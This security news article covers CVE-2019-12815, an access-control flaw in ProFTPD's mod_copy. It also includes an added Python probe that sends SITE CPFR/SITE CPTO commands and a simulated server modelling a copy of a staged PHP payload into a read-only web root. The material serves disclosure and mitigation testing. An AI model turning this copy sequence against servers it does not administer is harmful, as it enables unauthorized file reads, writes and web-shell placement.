New ‘Arbitrary File Copy’ Vulnerability Impacts ProFTPD FTP Servers

A serious vulnerability has been disclosed in ProFTPD, one of the most widely used FTP server applications, with over one million servers reported to be affected. The flaw, found by German security researcher Tobias Mädel, lies in the mod_copy module, which implements the SITE CPFR and SITE CPTO commands so that clients can copy files and directories server-side, without downloading and re-uploading the data.

ProFTPD is an open-source FTP server used by numerous businesses and websites, including SourceForge and Slackware. It is packaged by many Linux and Unix distributions, including Debian, so it is deeply embedded in server infrastructure worldwide.

The vulnerability stems from inadequate access control in mod_copy: its copy commands were not subject to the same read and write permission checks that ProFTPD applies to ordinary transfers. A logged-in user could therefore copy files into directories where the account has no write permission, and copy files the account could not otherwise read into a directory it can download from. Depending on what is on the server and where, this can lead to information disclosure or remote code execution.

According to John Simpson, a security expert at Trend Micro, achieving remote code execution requires copying a malicious PHP file into a directory from which the web server executes scripts; in practice the attacker also needs some location where the payload can be uploaded first, since mod_copy only copies files that already exist on the server. Not every ProFTPD installation is exposed to remote exploitation: the attacker must be able to log in, either with valid credentials or because the server permits anonymous access.

The vulnerability is tracked as CVE-2019-12815 and affects all ProFTPD versions up to and including 1.3.6, which was released in 2017 and was the latest release at the time of disclosure. Because mod_copy is compiled in and enabled by default in many builds, the potential for widespread impact is considerable.

This is not the first flaw in mod_copy: CVE-2015-3306 allowed unauthenticated remote attackers to read and write arbitrary files through the same SITE CPFR and SITE CPTO commands. Mädel first reported the new issue to the ProFTPD maintainers in September 2018, and more than nine months passed before it was addressed. Only after he contacted the Debian Security Team did the ProFTPD developers commit a fix and backport it to the 1.3.6 branch; at the time of writing no new formal release containing the fix had been issued.

Until a build containing the fix is deployed, server administrators are advised to disable mod_copy in their ProFTPD configuration, either by not loading the module at all or by denying the SITE_CPFR and SITE_CPTO commands to all users with a `<Limit>` block, so that the vulnerable commands are no longer available. Afterwards, confirm from a test account that SITE CPFR is rejected rather than answered with a 350 reply.
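The exploit path described above and the post-mitigation check a practitioner would want, as an added example in Python (not code from the ProFTPD project or from Mädel's advisory). It drives the two mod_copy commands, SITE CPFR and SITE CPTO, through an `ftplib`-style `sendcmd` and classifies the outcome from the reply codes; a constructed in-memory stand-in for the server (reply texts approximate ProFTPD's) models an unpatched build, a patched build that enforces write permission on the destination, and a build with mod_copy disabled. The file paths, the account's writable directory and the `probe_live` helper are assumptions for illustration.

```python
"""Probe an FTP account for mod_copy's server-side copy (SITE CPFR / SITE CPTO).

Added example, not code from ProFTPD or from the CVE-2019-12815 advisory.
The sequence is: SITE CPFR <src> (server answers 350), then SITE CPTO <dst>
(server answers 250 when the copy was performed). On an unpatched server the
copy succeeds even when the account may not write to <dst>.
"""
import ftplib
from typing import Callable

# Outcomes of one CPFR/CPTO attempt.
COPIED = "copied"                # server performed the copy
DENIED = "denied"                # server refused (5xx other than "unknown command")
NOT_SUPPORTED = "not_supported"  # SITE CPFR unknown: mod_copy not loaded (500/502)
UNEXPECTED = "unexpected"        # reply did not follow the 350 / 250 flow


def probe_site_copy(sendcmd: Callable[[str], str], src: str, dst: str) -> str:
    """Send SITE CPFR <src> then SITE CPTO <dst> and classify the result.

    `sendcmd` must behave like ftplib.FTP.sendcmd: return the reply line for
    1xx-3xx codes and raise ftplib.error_perm for 5xx codes.
    """
    try:
        reply = sendcmd(f"SITE CPFR {src}")
    except ftplib.error_perm as exc:
        return NOT_SUPPORTED if str(exc)[:3] in ("500", "502") else DENIED
    if not reply.startswith("350"):
        return UNEXPECTED
    try:
        reply = sendcmd(f"SITE CPTO {dst}")
    except ftplib.error_perm as exc:
        return NOT_SUPPORTED if str(exc)[:3] in ("500", "502") else DENIED
    return COPIED if reply.startswith("250") else UNEXPECTED


def probe_live(host: str, user: str, password: str, src: str, dst: str,
               timeout: float = 10.0) -> str:
    """Run the probe against a real server (assumed helper, not run here).

    Use only on servers you administer, with a harmless `src`, a scratch `dst`
    the test account must NOT be able to write to, and delete any copy made.
    """
    with ftplib.FTP(host, timeout=timeout) as ftp:
        ftp.login(user, password)
        return probe_site_copy(ftp.sendcmd, src, dst)


class FakeProftpd:
    """Constructed stand-in for a ProFTPD control connection (no network).

    `writable`: directories the logged-in account may write to.
    `limit_enforced`: True models the fix (SITE CPTO checks write permission
    like an upload does); False models CVE-2019-12815 (copies regardless).
    `mod_copy_loaded=False` models the mitigation of disabling the module.
    Reply texts approximate ProFTPD's and are not copied from its source.
    """

    def __init__(self, writable, limit_enforced: bool, mod_copy_loaded: bool = True):
        self.writable = set(writable)
        self.limit_enforced = limit_enforced
        self.mod_copy_loaded = mod_copy_loaded
        self.pending_src = None
        self.copies = []  # (src, dst) pairs the "server" actually copied

    def sendcmd(self, cmd: str) -> str:
        parts = cmd.split(" ", 2)
        known = len(parts) == 3 and parts[0] == "SITE" and parts[1] in ("CPFR", "CPTO")
        if not known or not self.mod_copy_loaded:
            raise ftplib.error_perm(f"500 '{cmd}' not understood")
        sub, path = parts[1], parts[2]
        if sub == "CPFR":
            self.pending_src = path
            return "350 File or directory exists, ready for destination name"
        if self.pending_src is None:
            raise ftplib.error_perm("503 Bad sequence of commands")
        dst_dir = path.rsplit("/", 1)[0] or "/"
        if self.limit_enforced and dst_dir not in self.writable:
            raise ftplib.error_perm(f"550 {path}: Permission denied")
        self.copies.append((self.pending_src, path))
        self.pending_src = None
        return "250 Copy successful"


def demo() -> dict:
    """Scenarios from the article: read-only web root, staged PHP payload (constructed paths)."""
    src = "/home/ftp/upload/payload.php"   # attacker-staged file in an upload directory
    dst = "/var/www/html/payload.php"      # web root the account cannot write to
    ok_dst = "/home/ftp/upload/copy.php"   # legitimate copy inside the writable directory
    writable = {"/home/ftp/upload"}
    return {
        "unpatched": probe_site_copy(FakeProftpd(writable, limit_enforced=False).sendcmd, src, dst),
        "patched": probe_site_copy(FakeProftpd(writable, limit_enforced=True).sendcmd, src, dst),
        "patched_allowed": probe_site_copy(FakeProftpd(writable, limit_enforced=True).sendcmd, src, ok_dst),
        "mod_copy_off": probe_site_copy(FakeProftpd(writable, True, mod_copy_loaded=False).sendcmd, src, dst),
    }


if __name__ == "__main__":
    for scenario, outcome in demo().items():
        print(f"{scenario:16s} {outcome}")
```

Only `copied` against a destination the test account cannot write to indicates the unpatched behaviour; `denied` means the server now enforces permissions on SITE CPTO, and `not_supported` means the commands are gone entirely, which is what disabling mod_copy should produce.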

In MITRE ATT&CK terms, an attack built on this flaw combines initial access through Valid Accounts (T1078) or Exploit Public-Facing Application (T1190) with persistence via a Web Shell (T1505.003) once a PHP file has been copied into a web-served directory, and the copy itself lets the account act beyond the permissions it was granted. The outcome is unauthorized file writes and reads, potentially leading to service disruption and exposure of sensitive information.

The ProFTPD case is a reminder that widely used server software carries vulnerabilities of its own and that robust server management practices matter. Operators should track such disclosures and take proactive measures to protect their systems before exploitation occurs.